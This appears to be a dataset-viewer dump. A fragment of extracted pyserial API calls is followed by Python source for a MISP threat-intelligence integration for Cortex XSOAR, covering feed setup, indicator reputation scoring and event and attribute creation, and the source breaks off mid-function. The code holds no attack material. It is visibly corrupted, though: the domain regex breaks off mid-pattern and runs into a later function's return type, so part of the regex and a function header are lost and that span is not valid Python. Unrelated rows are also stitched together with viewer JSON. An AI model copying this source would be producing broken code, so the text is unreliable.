((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\\n', (1516, 1551), False, 'import FCNTL\\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)\\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\\n', (18966, 18985), False, 'import array, fcntl\\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\\n', (19023, 19042), False, 'import array, fcntl\\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\\n', (19223, 19257), False, 'import array, fcntl\\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\\n', (19295, 19329), False, 'import array, fcntl\\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\\n', (19514, 19548), False, 'import array, fcntl\\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\\n', (19586, 19620), False, 'import array, fcntl\\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((3798, 3826), 'array.array', 'array.array', (['\"\"\"i\"\"\"', '[baudrate]'], {}), \"('i', [baudrate])\\n\", (3809, 3826), False, 'import array, fcntl\\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\\n', (3910, 3940), False, 'import array, fcntl\\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['(\"\"\"don\\'t know how to number ttys on this system.\\n! Use an explicit path (eg /dev/ttyS1) or send this information to\\n! the author of this module:\\n\\nsys.platform = %r\\nos.name = %r\\nserialposix.py version = %s\\n\\nalso add the device name of the serial port and where the\\ncounting starts for the first serial port.\\ne.g. \\'first serial port: /dev/ttyS0\\'\\nand with a bit luck you can get this module running...\\n\"\"\"\\n % (sys.platform, os.name, VERSION))'], {}), '(\\n \"\"\"don\\'t know how to number ttys on this system.\\n! Use an explicit path (eg /dev/ttyS1) or send this information to\\n! the author of this module:\\n\\nsys.platform = %r\\nos.name = %r\\nserialposix.py version = %s\\n\\nalso add the device name of the serial port and where the\\ncounting starts for the first serial port.\\ne.g. \\'first serial port: /dev/ttyS0\\'\\nand with a bit luck you can get this module running...\\n\"\"\"\\n % (sys.platform, os.name, VERSION))\\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n')]"}}},{"rowIdx":718,"cells":{"code":{"kind":"string","value":"# type: ignore\nfrom typing import Union, List, Dict\nfrom urllib.parse import urlparse\nimport urllib3\n\nfrom pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\nfrom pymisp.tools import GenericObjectGenerator\nimport copy\nfrom pymisp.tools import FileObject\n\nfrom CommonServerPython import *\n\nlogging.getLogger(\"pymisp\").setLevel(logging.CRITICAL)\n\n\ndef handle_connection_errors(error):\n if \"SSLError\" in error:\n return_error('Unable to connect to MISP because of a SSLCertVerificationError, '\n 'Please try to use the Trust any certificate option.')\n if \"NewConnectionError\" in error:\n return_error('Unable to connect to MISP because of a NewConnectionError, '\n 'Please make sure your MISP server url is correct.')\n if \"Please make sure the API key and the URL are correct\" in error:\n return_error('Unable to connect to MISP, '\n 'Please make sure the API key is correct.')\n return_error(error)\n\n\ndef warn(*args):\n \"\"\"\n Do nothing with warnings\n \"\"\"\n pass\n\n\n# Disable requests warnings\nurllib3.disable_warnings()\n\n# Disable python warnings\nwarnings.warn = warn\n\n''' GLOBALS/PARAMS '''\nparams = demisto.params()\nif not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):\n raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.')\nMISP_URL = params.get('url')\nVERIFY = not params.get('insecure')\nPROXIES = handle_proxy() # type: ignore\ntry:\n PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\nexcept PyMISPError as e:\n handle_connection_errors(e.message)\n\nPREDEFINED_FEEDS = {\n 'CIRCL': {'name': 'CIRCL OSINT Feed',\n 'url': 'https://www.circl.lu/doc/misp/feed-osint',\n 'format': 'misp',\n 'input': 'network'},\n 'Botvrij.eu': {'name': 'The Botvrij.eu Data',\n 'url': 'http://www.botvrij.eu/data/feed-osint',\n 'format': 'misp',\n 'input': 'network'}\n}\n\nTHREAT_LEVELS_TO_ID = {\n 'High': 1,\n 'Medium': 2,\n 'Low': 3,\n 'Unknown': 4\n}\n\nMISP_ENTITIES_TO_CONTEXT_DATA = {\n 'deleted': 'Deleted',\n 'category': 'Category',\n 'comment': 'Comment',\n 'uuid': 'UUID',\n 'sharing_group_id': 'SharingGroupID',\n 'timestamp': 'LastChanged',\n 'to_ids': 'ToIDs',\n 'value': 'Value',\n 'event_id': 'EventID',\n 'ShadowAttribute': 'ShadowAttribute',\n 'disable_correlation': 'DisableCorrelation',\n 'distribution': 'Distribution',\n 'type': 'Type',\n 'id': 'ID',\n 'date': 'CreationDate',\n 'info': 'Info',\n 'published': 'Published',\n 'attribute_count': 'AttributeCount',\n 'proposal_email_lock': 'ProposalEmailLock',\n 'locked': 'Locked',\n 'publish_timestamp': 'PublishTimestamp',\n 'event_creator_email': 'EventCreatorEmail',\n 'name': 'Name',\n 'analysis': 'Analysis',\n 'threat_level_id': 'ThreatLevelID',\n 'old_id': 'OldID',\n 'org_id': 'OrganizationID',\n 'Org': 'Organization',\n 'Orgc': 'OwnerOrganization',\n 'orgc_uuid': 'OwnerOrganization.UUID',\n 'orgc_id': 'OwnerOrganization.ID',\n 'orgc_name': 'OwnerOrganization.Name',\n 'event_uuid': 'EventUUID',\n 'proposal_to_delete': 'ProposalToDelete',\n 'description': 'Description',\n 'version': 'Version',\n 'Object': 'Object',\n 'object_id': 'ObjectID',\n 'object_relation': 'ObjectRelation',\n 'template_version': 'TemplateVersion',\n 'template_uuid': 'TemplateUUID',\n 'meta-category': 'MetaCategory',\n 'decay_score': 'DecayScore',\n 'first_seen': 'first_seen',\n 'last_seen': 'last_seen',\n 'provider': 'Provider',\n 'source_format': 'SourceFormat',\n 'url': 'URL',\n 'event_uuids': 'EventUUIDS',\n}\n\nMISP_ANALYSIS_TO_IDS = {\n 'initial': 0,\n 'ongoing': 1,\n 'completed': 2\n}\n\nMISP_DISTRIBUTION_TO_IDS = {\n 'Your_organization_only': 0,\n 'This_community_only': 1,\n 'Connected_communities': 2,\n 'All_communities': 3,\n 'Inherit_event': 5\n}\n\nSIGHTING_TYPE_NAME_TO_ID = {\n 'sighting': 0,\n 'false_positive': 1,\n 'expiration': 2\n}\n\nSIGHTING_TYPE_ID_TO_NAME = {\n '0': 'sighting',\n '1': 'false_positive',\n '2': 'expiration'\n}\n\nINDICATOR_TYPE_TO_DBOT_SCORE = {\n 'FILE': DBotScoreType.FILE,\n 'URL': DBotScoreType.URL,\n 'DOMAIN': DBotScoreType.DOMAIN,\n 'IP': DBotScoreType.IP,\n 'EMAIL': DBotScoreType.EMAIL,\n}\n\nDOMAIN_REGEX = (\n r\"([a-z¡-\\uffff0-9](?:[a-z¡-\\uffff0-9-]{0,61}\"\n \"[a-z¡-\\uffff0-9])?(?:\\\\.(?!-)[a-z¡-\\uffff0-9-]{1,63}(? List[dict]:\n \"\"\"\n Extracting errors raised by PYMISP into readable response, for more information and examples\n please see UT: test_extract_error.\n\n Args:\n error: list of responses from error section\n\n Returns:\n List[Dict[str, any]]: filtered response\n \"\"\"\n return [{\n 'code': err[0],\n 'message': err[1].get('message'),\n 'errors': err[1].get('errors')\n } for err in error]\n\n\ndef dict_to_generic_object_format(args: dict) -> List[dict]:\n \"\"\"\n Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp.\n Args:\n args: dictionary describes MISP object\n\n Returns:\n list: list containing dicts that GenericObjectGenerator can take.\n\n Examples:\n >>> {'ip': '8.8.8.8', 'domain': 'google.com'}\n [{'ip': '8.8.8.8'}, {'domain': 'google.com'}]\n \"\"\"\n return [{k: v} for k, v in args.items()]\n\n\ndef build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:\n \"\"\"\n\n Args:\n template_name: template name as described in https://github.com/MISP/misp-objects\n args: arguments to create the generic object\n\n Returns:\n GenericObjectGenerator: object created in MISP\n\n Example:\n args should look like:\n [{'analysis_submitted_at': '2018-06-15T06:40:27'},\n {'threat_score': {value=95, to_ids=False}},\n {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},\n {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},\n {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line\n \"\"\"\n misp_object = GenericObjectGenerator(template_name)\n misp_object.generate_attributes(args)\n return misp_object\n\n\ndef misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:\n \"\"\"\n Gets a timestamp from MISP response (1546713469) and converts it to human readable format\n \"\"\"\n return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else \"\"\n\n\ndef replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:\n \"\"\"\n Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT)\n\n Args:\n obj_to_build (Union[dict, list, str]): object to replace keys in\n\n Returns:\n Union[dict, list, str]: same object type that got in\n \"\"\"\n if isinstance(obj_to_build, list):\n return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]\n if isinstance(obj_to_build, dict):\n return {\n (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):\n replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()\n }\n return obj_to_build\n\n\ndef reputation_command_to_human_readable(outputs, score, events_to_human_readable):\n found_tag_id, found_tag_name = \"\", \"\"\n for event in events_to_human_readable:\n # removing those fields as they are shared by the events\n found_tag_id = event.pop('Tag_ID')\n found_tag_name = event.pop('Tag_Name')\n return {\n 'Attribute Type': outputs[0].get('Type'),\n 'Dbot Score': score,\n 'Attribute Value': outputs[0].get('Value'),\n 'Attribute Category': outputs[0].get('Category'),\n 'Timestamp': outputs[0].get('Timestamp'),\n 'Events with the scored tag': events_to_human_readable,\n 'Scored Tag ID': found_tag_id,\n 'Scored Tag Name': found_tag_name,\n }\n\n\ndef limit_tag_output_to_id_and_name(attribute_dict, is_event_level):\n \"\"\"\n As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields.\n In addition, returns set of the found tag ids.\n\n Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag.\n Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag.\n If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags\n (event ones and the event's attribute tags ones as it is part of the event scope).\n If the data is attribute's (is_event_level = false), and the tag is only related to an attribute\n we would like to add it to tag_set_ids. In any other case, we won't add the tag.\n\n Args:\n attribute_dict (dict): The dictionary that includes the tag list.\n is_event_level (bool): Whether the attribute_dict was received from an event object,\n meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).\n \"\"\"\n output = []\n tag_set_ids = set()\n tags_list = attribute_dict.get('Tag', [])\n for tag in tags_list:\n is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'\n tag_id = tag.get('id')\n if is_event_level:\n tag_set_ids.add(tag_id)\n else: # attribute level\n if not is_event_tag:\n tag_set_ids.add(tag_id)\n output.append({'ID': tag_id, 'Name': tag.get('name')})\n return output, tag_set_ids\n\n\ndef parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):\n \"\"\"\n After getting all the attributes which match the required indicator value, this function parses the response.\n This function goes over all the attributes that found (after limit the attributes amount to the given limit)\n and by sub-functions calculated the score of the indicator.\n For the context data outputs, for every attribute we remove the \"Related Attribute\" list and limits the tags and\n galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects.\n Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are\n the newer ones.\n\n Returns:\n response (dict): The parsed outputs to context data (array of attributes).\n score: the indicator score\n found_tag: the tag (id) which made the indicator to get that score\n found_related_events (dict): contains info (name, id, threat level id) about all the events that include\n the indicator\n\n Please see an example for a response in test_data/reputation_command_response.json\n Please see an example for a parsed output in test_data/reputation_command_outputs.json\n \"\"\"\n response = copy.deepcopy(misp_response)\n attributes_list = response.get('Attribute')\n if not attributes_list:\n return None\n attributes_list = sorted(attributes_list,\n key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]\n found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)\n attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)\n score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,\n malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,\n is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)\n formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})\n return formatted_response, score, found_tag, found_related_events\n\n\ndef prepare_attributes_array_to_context_data(attributes_list):\n attributes_tag_ids, event_tag_ids = set(), set()\n found_related_events = {}\n if not attributes_list:\n return None\n for attribute in attributes_list:\n attribute.pop(\"RelatedAttribute\") # get rid of this useless list\n event = attribute.get('Event')\n convert_timestamp_to_readable(attribute, event)\n found_related_events[event.get(\"id\")] = {\"Event Name\": event.get(\"info\"),\n \"Threat Level ID\": event.get('threat_level_id'),\n \"Event ID\": event.get(\"id\")}\n if event.get('Tag'):\n limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)\n event['Tag'] = limit_tag_output\n event_tag_ids.update(tag_ids)\n if attribute.get('Tag'):\n limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)\n attribute['Tag'] = limit_tag_output\n attributes_tag_ids.update(tag_ids)\n return found_related_events, attributes_tag_ids, event_tag_ids\n\n\ndef convert_timestamp_to_readable(attribute, event):\n if attribute.get('timestamp'):\n attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))\n if event:\n if event.get('timestamp'):\n attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))\n if event.get('publish_timestamp'):\n attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(\n event.get('publish_timestamp'))\n\n\ndef found_event_with_bad_threat_level_id(found_related_events):\n bad_threat_level_ids = [\"1\", \"2\", \"3\"]\n for event in found_related_events.values():\n if event['Threat Level ID'] in bad_threat_level_ids:\n return True\n return False\n\n\ndef get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,\n is_attribute_in_event_with_bad_threat_level):\n \"\"\"\n Calculates the indicator score by following logic. Indicators of attributes and Events that:\n * have tags which configured as malicious will be scored 3 (i.e malicious).\n * have tags which configured as suspicious will be scored 2 (i.e suspicious).\n * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In\n such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.\n note:\n - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will\n be scored as malicious.\n - Attributes tags (both malicious and suspicious) are stronger than events' tags.\n \"\"\"\n found_tag = None\n is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)\n if is_attribute_tag_malicious:\n return Common.DBotScore.BAD, found_tag\n\n is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)\n if is_attribute_tag_suspicious:\n return Common.DBotScore.SUSPICIOUS, found_tag\n\n is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)\n if is_event_tag_malicious:\n return Common.DBotScore.BAD, found_tag\n\n is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)\n if is_event_tag_suspicious:\n return Common.DBotScore.SUSPICIOUS, found_tag\n\n # no tag was found\n if is_attribute_in_event_with_bad_threat_level:\n return Common.DBotScore.BAD, None\n\n return Common.DBotScore.NONE, None\n\n\ndef get_new_misp_event_object(args):\n \"\"\"\n Create a new MISP event object and set the event's details.\n \"\"\"\n event = MISPEvent()\n event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]\n threat_level_id_arg = args.get('threat_level_id')\n if threat_level_id_arg:\n event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]\n analysis_arg = args.get('analysis')\n event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg\n event.info = args.get('info') if args.get('info') else 'Event from XSOAR'\n event.date = datetime.today()\n event.published = argToBoolean(args.get('published', 'False'))\n return event\n\n\ndef create_event_command(demisto_args: dict):\n \"\"\"Creating event in MISP with the given attribute args\"\"\"\n new_event = get_new_misp_event_object(demisto_args)\n new_event = PYMISP.add_event(new_event, True)\n\n if isinstance(new_event, dict) and new_event.get('errors'):\n raise DemistoException(new_event.get('errors'))\n\n event_id = new_event.id\n add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)\n event = PYMISP.search(eventid=event_id)\n human_readable = f\"## MISP create event\\nNew event with ID: {event_id} has been successfully created.\\n\"\n\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(event),\n raw_response=event\n )\n\n\ndef add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):\n \"\"\"Adding attribute to a given MISP event object\n This function can be called as an independence command or as part of another command (create event for example)\n\n Args:\n event_id (int): Event ID to add attribute to\n internal (bool): if set to True, will not post results to Demisto\n demisto_args (dict): Demisto args\n new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to\n that existing event.\n \"\"\"\n attributes_args = {\n 'id': demisto_args.get('event_id'), # misp event id\n 'type': demisto_args.get('type', 'other'),\n 'category': demisto_args.get('category', 'External analysis'),\n 'to_ids': argToBoolean(demisto_args.get('to_ids', True)),\n 'comment': demisto_args.get('comment'),\n 'value': demisto_args.get('value')\n }\n event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), \"event_id\")\n attributes_args.update({'id': event_id}) if event_id else None\n distribution = demisto_args.get('distribution')\n attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None\n\n if not new_event:\n response = PYMISP.search(eventid=event_id, pythonify=True)\n if not response:\n raise DemistoException(\n f\"Error: An event with the given id: {event_id} was not found in MISP. please check it once again\")\n new_event = response[0] # response[0] is MISP event\n\n new_event.add_attribute(**attributes_args)\n PYMISP.update_event(event=new_event)\n if internal:\n return\n\n value = attributes_args.get('value')\n updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)\n human_readable = f\"## MISP add attribute\\nNew attribute: {value} was added to event id {new_event.id}.\\n\"\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(updated_event),\n raw_response=updated_event\n )\n\n\ndef generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,\n reliability, attributes_limit):\n reputation_value_list = argToList(demisto_args.get(reputation_type), ',')\n command_results = []\n for value in reputation_value_list:\n command_results.append(\n get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,\n attributes_limit))\n return command_results\n\n\ndef reputation_value_validation(value, dbot_type):\n if dbot_type == 'FILE':\n # hashFormat will be used only in output\n hash_format = get_hash_type(value)\n if hash_format == 'Unknown':\n raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')\n if dbot_type == 'IP':\n if not is_ip_valid(value):\n raise DemistoException(f\"Error: The given IP address: {value} is not valid\")\n if dbot_type == 'DOMAIN':\n if not re.compile(DOMAIN_REGEX, regexFlags).match(value):\n raise DemistoException(f\"Error: The given domain: {value} is not valid\")\n if dbot_type == 'URL':\n if not re.compile(urlRegex, regexFlags).match(value):\n raise DemistoException(f\"Error: The given url: {value} is not valid\")\n if dbot_type == 'EMAIL':\n if not re.compile(emailRegex, regexFlags).match(value):\n raise DemistoException(f\"Error: The given email address: {value} is not valid\")\n\n\ndef get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):\n \"\"\"\n This function searches for the given attribute value in MISP and then calculates it's dbot score.\n The score is calculated by the tags ids (attribute tags and event tags).\n Args:\n value (str): The indicator value (an IP address, email address, domain, url or file hash).\n dbot_type (str): Indicator type (file, url, domain, email or ip).\n malicious_tag_ids (set): Tag ids should be recognised as malicious.\n suspicious_tag_ids (set): Tag ids should be recognised as suspicious\n reliability (DBotScoreReliability): integration reliability score.\n attributes_limit (int) : Limits the number of attributes that will be written to the context\n\n Returns:\n CommandResults includes all the indicator results.\n \"\"\"\n reputation_value_validation(value, dbot_type)\n misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,\n include_correlations=True, include_event_tags=True, enforce_warninglist=True,\n include_decay_score=True, includeSightings=True)\n indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]\n is_indicator_found = misp_response and misp_response.get('Attribute')\n if is_indicator_found:\n outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,\n malicious_tag_ids,\n suspicious_tag_ids,\n attributes_limit)\n dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,\n score=score, reliability=reliability, malicious_description=\"Match found in MISP\")\n indicator = get_dbot_indicator(dbot_type, dbot, value)\n all_attributes = outputs.get('Attribute')\n events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)\n attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)\n readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,\n removeNull=True)\n readable_output += tableToMarkdown('Related events', list(found_related_events.values()))\n return CommandResults(indicator=indicator,\n raw_response=misp_response,\n outputs=all_attributes,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n readable_output=readable_output)\n else:\n dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,\n score=Common.DBotScore.NONE, reliability=reliability,\n malicious_description=\"No results were found in MISP\")\n indicator = get_dbot_indicator(dbot_type, dbot, value)\n return CommandResults(indicator=indicator,\n readable_output=f\"No attributes found in MISP for value: {value}\")\n\n\ndef get_events_related_to_scored_tag(all_attributes, found_tag):\n \"\"\"\n This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored\n as malicious or suspicious.\n Args:\n all_attributes (dict): The parsed response from the MISP search attribute request\n found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is\n Unknown so no events should be found.\n\n Returns:\n list includes all the events that were detected as related to the tag.\n \"\"\"\n scored_events = []\n if found_tag:\n for attribute in all_attributes:\n event = attribute.get('Event', {})\n event_name = event.get('Info')\n scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))\n scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))\n return remove_duplicated_related_events(scored_events)\n\n\ndef remove_duplicated_related_events(related_events):\n related_events_no_duplicates = []\n for i in range(len(related_events)):\n if related_events[i] not in related_events[i + 1:]:\n related_events_no_duplicates.append(related_events[i])\n return related_events_no_duplicates\n\n\ndef search_events_with_scored_tag(object_data_dict, found_tag, event_name):\n \"\"\"\n By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be\n added to related_events list\n Args:\n object_data_dict (dict): Event or attribute dict which includes tags list.\n found_tag (str): The tag that was scored as malicious or suspicious.\n event_name (str): Name of the event\n \"\"\"\n related_events = []\n object_tags_list = object_data_dict.get('Tag', [])\n for tag in object_tags_list:\n if tag.get('ID') == found_tag:\n event_id = get_event_id(object_data_dict)\n tag_name = tag.get('Name')\n related_events.append({'Event_ID': event_id, 'Event_Name': event_name,\n 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})\n return related_events\n\n\ndef get_event_id(data_dict):\n if data_dict.get('EventID'):\n return data_dict.get('EventID')\n elif data_dict.get('ID'):\n return data_dict.get('ID')\n return data_dict.get('Event', {}).get('ID')\n\n\ndef get_dbot_indicator(dbot_type, dbot_score, value):\n if dbot_type == \"FILE\":\n hash_type = get_hash_type(value)\n if hash_type == 'md5':\n return Common.File(dbot_score=dbot_score, md5=value)\n if hash_type == 'sha1':\n return Common.File(dbot_score=dbot_score, sha1=value)\n if hash_type == 'sha256':\n return Common.File(dbot_score=dbot_score, sha256=value)\n if dbot_type == \"IP\":\n return Common.IP(ip=value, dbot_score=dbot_score)\n if dbot_type == \"DOMAIN\":\n return Common.Domain(domain=value, dbot_score=dbot_score)\n if dbot_type == \"EMAIL\":\n return Common.EMAIL(address=value, dbot_score=dbot_score)\n if dbot_type == \"URL\":\n return Common.URL(url=value, dbot_score=dbot_score)\n\n\ndef build_misp_complex_filter(demisto_query: str):\n \"\"\"\n Examples are available in UT: test_build_misp_complex_filter.\n For more information please see build_complex_query in pymisp/api.py\n\n Args:\n demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:'\n using ',' as delimiter for parameters and ';' as delimiter for operators.\n using the operators is optional.\n if 'demisto_query' does not contains any of the complex operators the original\n input will be returned\n\n Returns:\n str: dictionary created for misp to perform complex query\n or if no complex query found returns the original input\n \"\"\"\n\n regex_and = r'(AND:)([^\\;]+)(;)?'\n regex_or = r'(OR:)([^\\;]+)(;)?'\n regex_not = r'(NOT:)([^\\;]+)(;)?'\n misp_query_params = dict()\n\n match_and = re.search(regex_and, demisto_query, re.MULTILINE)\n match_or = re.search(regex_or, demisto_query, re.MULTILINE)\n match_not = re.search(regex_not, demisto_query, 